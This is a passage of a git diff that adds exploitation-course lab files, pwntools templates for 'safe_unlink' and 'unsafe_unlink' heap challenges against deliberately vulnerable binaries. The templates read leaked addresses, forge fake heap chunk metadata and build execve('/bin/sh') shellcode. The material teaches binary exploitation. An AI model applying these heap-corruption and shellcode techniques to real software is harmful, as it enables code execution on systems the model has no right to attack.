+# This binary leaks the address of its m_array.
+io.recvuntil("m_array @ ")
+m_array = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Log some useful addresses.
+log.info(f"libc is at 0x{libc.address:02x}")
+log.info(f"heap is at 0x{heap:02x}")
+log.info(f"m_array is at 0x{m_array:02x}")
+
+# Request 2 chunks.
+chunk_A = malloc(0x88)
+chunk_B = malloc(0x18)
+
+# Free "chunk_A".
+free(chunk_A)
+
+# Edit "chunk_B".
+edit(chunk_B, "Y"*8)
+
+# Read data from the "chunk_B".
+log.info(f"reading chunk_B: {read(chunk_B)[:8]}")
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/safe_unlink/pwntools_template.py b/HeapLAB/safe_unlink/pwntools_template.py
new file mode 100755
index 0000000..ff1c1b2
--- /dev/null
+++ b/HeapLAB/safe_unlink/pwntools_template.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("safe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Print the address of m_array, where the program stores pointers to its allocated chunks.
+log.info(f"m_array @ 0x{elf.sym.m_array:02x}")
+
+# Request 2 small chunks.
+chunk_A = malloc(0x88)
+chunk_B = malloc(0x88)
+
+# Prepare fake chunk metadata.
+fd = 0xdeadbeef
+bk = 0xcafebabe
+prev_size = 0x90
+fake_size = 0x90
+edit(chunk_A, p64(fd) + p64(bk) + p8(0)*0x70 + p64(prev_size) + p64(fake_size))
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/safe_unlink/safe_unlink b/HeapLAB/safe_unlink/safe_unlink
new file mode 100755
index 0000000..83b07b1
Binary files /dev/null and b/HeapLAB/safe_unlink/safe_unlink differ
diff --git a/HeapLAB/unsafe_unlink/demo b/HeapLAB/unsafe_unlink/demo
new file mode 100755
index 0000000..201b741
Binary files /dev/null and b/HeapLAB/unsafe_unlink/demo differ
diff --git a/HeapLAB/unsafe_unlink/pwntools_template.py b/HeapLAB/unsafe_unlink/pwntools_template.py
new file mode 100755
index 0000000..8dd9d69
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/pwntools_template.py
@@ -0,0 +1,72 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("unsafe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
+shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
+
+# Request a small chunk.
+small_chunk = malloc(0x88)
+
+# Edit the small chunk.
+edit(small_chunk, "X"*32)
+
+# Free the small chunk.
+free(small_chunk)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/unsafe_unlink/unsafe_unlink b/HeapLAB/unsafe_unlink/unsafe_unlink
new file mode 100755
index 0000000..190fe07
Binary files /dev/null and b/HeapLAB/unsafe_unlink/unsafe_unlink differ
diff --git a/original.gz b/original.gz
new file mode 100644
index 0000000..5335e54
Binary files /dev/null and b/original.gz differ